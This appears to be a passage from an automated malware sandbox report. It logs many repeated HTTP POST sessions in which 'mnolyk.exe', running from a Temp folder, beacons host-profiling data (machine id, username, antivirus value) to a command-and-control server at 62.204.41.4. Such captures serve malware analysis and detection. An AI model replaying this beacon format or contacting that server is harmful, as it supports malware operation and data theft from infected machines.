719	192.168.2.5	50432	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:26.215533972 CET	964	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:26.280097008 CET	964	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
72	192.168.2.5	49778	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:24.022380114 CET	263	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:24.088174105 CET	263	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
720	192.168.2.5	50433	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:26.461663008 CET	965	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:26.525734901 CET	965	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
721	192.168.2.5	50434	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:26.717538118 CET	966	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:26.781004906 CET	966	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
722	192.168.2.5	50435	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:26.957151890 CET	967	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:27.019088984 CET	967	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
723	192.168.2.5	50436	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:27.196537018 CET	968	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:27.262902021 CET	968	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
724	192.168.2.5	50437	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:27.438497066 CET	969	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:27.500554085 CET	969	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
725	192.168.2.5	50438	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:27.675587893 CET	970	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:27.740813017 CET	970	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
726	192.168.2.5	50439	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:27.911911011 CET	971	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:27.977287054 CET	971	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
727	192.168.2.5	50440	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:28.144248962 CET	972	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:28.210213900 CET	972	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
728	192.168.2.5	50441	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:28.375722885 CET	973	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:28.438319921 CET	973	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
729	192.168.2.5	50442	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:28.613579988 CET	974	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:28.676589966 CET	974	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
73	192.168.2.5	49779	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:24.309470892 CET	264	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:24.376708984 CET	264	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
730	192.168.2.5	50443	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:28.848844051 CET	975	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:28.917032957 CET	975	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
731	192.168.2.5	50444	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:29.095830917 CET	976	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:29.163250923 CET	976	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
732	192.168.2.5	50445	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:29.348634005 CET	977	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:29.415103912 CET	977	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
733	192.168.2.5	50446	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:29.582178116 CET	978	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:29.646863937 CET	978	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
734	192.168.2.5	50447	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:29.817137957 CET	979	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:29.883445978 CET	979	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
735	192.168.2.5	50448	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:30.077914000 CET	980	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:30.143573046 CET	980	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
736	192.168.2.5	50449	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:30.317848921 CET	981	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:30.383908033 CET	981	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
737	192.168.2.5	50450	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:30.549659967 CET	982	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:30.614676952 CET	982	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
738	192.168.2.5	50451	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:30.804845095 CET	983	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
